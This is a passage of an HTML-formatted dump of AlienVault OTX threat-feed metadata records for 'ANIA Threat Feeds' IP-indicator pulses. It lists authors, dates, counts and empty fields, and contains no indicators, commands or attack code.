&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'vote':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'votes_count':&nbsp;0},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{'TLP':&nbsp;'green',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'adversary':&nbsp;'',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'attack_ids':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'author':&nbsp;{'avatar_url':&nbsp;'https://otx20-web-media.s3.amazonaws.com/media/avatars/user_91912/resized/80/avatar_2b1b2b88b6.png',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'91912',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_following':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribed':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'username':&nbsp;'AlessandroFiori'},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'cloned_from':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'comment_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'created':&nbsp;'2020-12-20T23:16:05.968000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'description':&nbsp;'ANIA&nbsp;Collector&nbsp;-&nbsp;Advanced&nbsp;Network&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Interactive&nbsp;Analysis&nbsp;Collector&nbsp;-&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Collected&nbsp;from&nbsp;Internet&nbsp;Storm&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Center&nbsp;IOCs&nbsp;List',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'downvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'export_count':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'follower_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'groups':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'5fdfdb3503578d7560ddf6a7',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'in_group':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_type_counts':&nbsp;{},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'industries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_author':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_modified':&nbsp;True,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribing':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'locked':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'malware_families':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified':&nbsp;'2021-01-19T23:00:30.114000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified_text':&nbsp;'91&nbsp;days&nbsp;ago&nbsp;',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'name':&nbsp;'IOCs&nbsp;-&nbsp;2020122102&nbsp;-&nbsp;ANIA&nbsp;Threat&nbsp;Feeds&nbsp;-&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'IP&nbsp;Segment&nbsp;1',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'public':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'pulse_source':&nbsp;'api',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'references':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_is_active':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_type':&nbsp;'IPv4',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'subscriber_count':&nbsp;254,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'tags':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'targeted_countries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_has_agents':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_scannable':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'upvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'validator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'vote':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'votes_count':&nbsp;0},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{'TLP':&nbsp;'green',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'adversary':&nbsp;'',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'attack_ids':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'author':&nbsp;{'avatar_url':&nbsp;'https://otx20-web-media.s3.amazonaws.com/media/avatars/user_91912/resized/80/avatar_2b1b2b88b6.png',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'91912',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_following':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribed':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'username':&nbsp;'AlessandroFiori'},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'cloned_from':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'comment_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'created':&nbsp;'2020-09-05T23:18:40.533000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'description':&nbsp;'ANIA&nbsp;Collector&nbsp;-&nbsp;Advanced&nbsp;Network&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Interactive&nbsp;Analysis&nbsp;Collector&nbsp;-&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Collected&nbsp;from&nbsp;Internet&nbsp;Storm&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Center&nbsp;IOCs&nbsp;List',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'downvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'export_count':&nbsp;3,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'follower_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'groups':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'5f541cd06825f09eadf2ab9b',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'in_group':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_type_counts':&nbsp;{},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&